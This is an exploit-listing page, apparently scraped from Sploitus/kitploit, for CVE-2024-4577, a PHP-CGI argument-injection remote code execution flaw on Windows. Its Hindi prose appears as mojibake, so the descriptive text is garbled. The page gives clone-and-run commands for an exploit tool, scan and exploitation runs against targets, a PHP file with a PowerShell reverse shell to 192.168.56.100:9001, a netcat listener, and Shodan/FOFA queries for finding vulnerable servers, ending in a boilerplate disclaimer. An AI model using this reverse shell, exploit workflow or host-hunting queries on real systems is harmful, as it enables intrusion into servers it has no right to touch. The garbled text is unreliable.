Sploitus

Exploit for CVE-2024-4577

kitploit ┬╖ 2026-08-25

Exploit Code

MARKDOWN104 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PHIROJSHAH-CVE-2024-4577
#  PHP CGI рдЖрд░реНрдЧреБрдореЗрдВрдЯ рдЗрдВрдЬреЗрдХреНрд╢рди (CVE-2024-4577) RCE 

## ЁЯУЬ рд╡рд┐рд╡рд░рдг

PHP рд╕рдВрд╕реНрдХрд░рдг 8.1.* (8.1.29 рд╕реЗ рдкрд╣рд▓реЗ), 8.2.* (8.2.20 рд╕реЗ рдкрд╣рд▓реЗ), 8.3.* (8.3.8 рд╕реЗ рдкрд╣рд▓реЗ) рдореЗрдВ, рдЬрдм Windows рдкрд░ Apache рдФрд░ PHP-CGI рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдпрджрд┐ рд╕рд┐рд╕реНрдЯрдо рдХреБрдЫ рдХреЛрдб рдкреЗрдЬреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рддреЛ Windows Win32 API рдлрдВрдХреНрд╢рди рдХреЛ рджрд┐рдП рдЧрдП рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдореЗрдВ рд╡рд░реНрдгреЛрдВ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП "Best-Fit" рд╡реНрдпрд╡рд╣рд╛рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИред PHP CGI рдореЙрдбреНрдпреВрд▓ рдЙрди рд╡рд░реНрдгреЛрдВ рдХреЛ PHP рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЗ рд░реВрдк рдореЗрдВ рдЧрд▓рдд рд╡реНрдпрд╛рдЦреНрдпрд╛ рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬреЛ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЪрд▓рд╛рдП рдЬрд╛ рд░рд╣реЗ PHP рдмрд╛рдЗрдирд░реА рдореЗрдВ рд╡рд┐рдХрд▓реНрдк рдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗ рд╕рдХрддрд╛ рд╣реИ, рдФрд░ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯреНрд╕ рдХреЗ рд╕реНрд░реЛрдд рдХреЛрдб рдХреЛ рдкреНрд░рдХрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рд╕рд░реНрд╡рд░ рдкрд░ рдордирдорд╛рдирд╛ PHP рдХреЛрдб рдЪрд▓рд╛ рд╕рдХрддрд╛ рд╣реИ, рдЖрджрд┐ред

"XAMPP рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдореЗрдВ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИ, рдФрд░ рд╣рдо /php-cgi/php-cgi.exe рдПрдВрдбрдкреЙрдЗрдВрдЯ рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдХрд┐рд╕реА .php рдПрдВрдбрдкреЙрдЗрдВрдЯ (рдЬреИрд╕реЗ /index.php) рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕рд░реНрд╡рд░ рдХреЛ CGI рдореЛрдб рдореЗрдВ PHP рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред"

## ЁЯЫая╕П рд╕реНрдерд╛рдкрдирд╛

root@kitploit:~
    
    
    $ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/
    $ cd CVE-2024-4577-RCE && pip install -r requirements.txt 
    

## тЪЩя╕П рдЙрдкрдпреЛрдЧ

$ python3 CVE-2024-4577.py -s -t https://target.com/

## ЁЯдЦ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдирд╛

### PHP рдкреЗрд▓реЛрдб

> [!NOTE] рдпрд╣ рдЙрдкрдХрд░рдг рдпрдерд╛рд░реНрдерд╡рд╛рджреА рдЖрдХреНрд░рдордг рдФрд░ рддрдХрдиреАрдХреЛрдВ (TTPs) рдХрд╛ рдкреНрд░рджрд░реНрд╢рди рдХрд░рддрд╛ рд╣реИред рд╣рд╛рд▓рд╛рдВрдХрд┐ рдпрд╣ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреЗрд▓реЛрдб рдирдореВрдирд╛ рдЗрд╕ рдкрд░рд┐рджреГрд╢реНрдп рдореЗрдВ рдХрд╛рд░реНрдп рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдХрд╛рд░реНрдпрд╛рддреНрдордХ рдкреЗрд▓реЛрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП shell.php рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВред

root@kitploit:~
    
    
    # rev_shell.php
    <?php
    $payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";
    
    exec($payload);
    ?>
     
    

## ЁЯЦея╕П рд╕рд░реНрд╡рд░ рд╕реНрдХреИрди рдХрд░рдирд╛

root@kitploit:~
    
    
    $ python3 CVE-2024-4577.py -s -t https://target.com/                                                   
      ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
     / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
    | |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
    | |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
     \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
    рд▓реЗрдЦрдХ: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC рдФрд░ рд╕реНрдХреИрдирд┐рдВрдЧ  
    
    [+] https://target.com рд▓рдХреНрд╖реНрдп CVE-2024-4577 рдХреЗ рд▓рд┐рдП рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИ
    

## ЁЯОп рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╕рд░реНрд╡рд░ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдирд╛

root@kitploit:~
    
    
    $ python3 CVE-2024-4577.py -t {targetsite.txt} -e -p rev_shell.php
                                                      
     ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
     / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
    | |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
    | |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
     \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
    рд▓реЗрдЦрдХ: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC рдФрд░ рд╕реНрдХреИрдирд┐рдВрдЧ  
    
    [+] рд╢реЛрд╖рдг рд╕рдлрд▓!
    

## ЁЯСиЁЯП╗тАНЁЯТ╗ Netcat рд╢реНрд░реЛрддрд╛

root@kitploit:~
    
    
    $ nc -lvnp 9001
    

## ЁЯФН рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╣реЛрд╕реНрдЯ рдЦреЛрдЬрдирд╛

  * **Shodan** : `server: PHP 8.1`, `server: PHP 8.2`, `server: PHP 8.3`
  * **FOFA** : `protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"`



## ЁЯТБ рд╕рдВрджрд░реНрдн

  * https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  * https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  * http://www.openwall.com/lists/oss-security/2024/06/07/1
  * https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  * https://www.php.net/ChangeLog-8.php#8.1.29
  * https://www.php.net/ChangeLog-8.php#8.2.20
  * https://www.php.net/ChangeLog-8.php#8.3.8
  * https://github.com/l0n3m4n/CVE-2024-4577-RCE/



## тЪая╕П рдЕрд╕реНрд╡реАрдХрд░рдг

рдпрд╣ рдЙрдкрдХрд░рдг рдХреЗрд╡рд▓ рд╢реИрдХреНрд╖рд┐рдХ рдФрд░ рдЕрдиреБрд╕рдВрдзрд╛рди рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд╛рди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдирд┐рд░реНрдорд╛рддрд╛ рдЗрд╕ рдЙрдкрдХрд░рдг рдХреЗ рдХрд┐рд╕реА рднреА рджреБрд░реБрдкрдпреЛрдЧ рдпрд╛ рд╣рд╛рдирд┐ рдХреЗ рд▓рд┐рдП рдХреЛрдИ рдЬрд┐рдореНрдореЗрджрд╛рд░реА рдирд╣реАрдВ рд▓реЗрддрд╛ рд╣реИред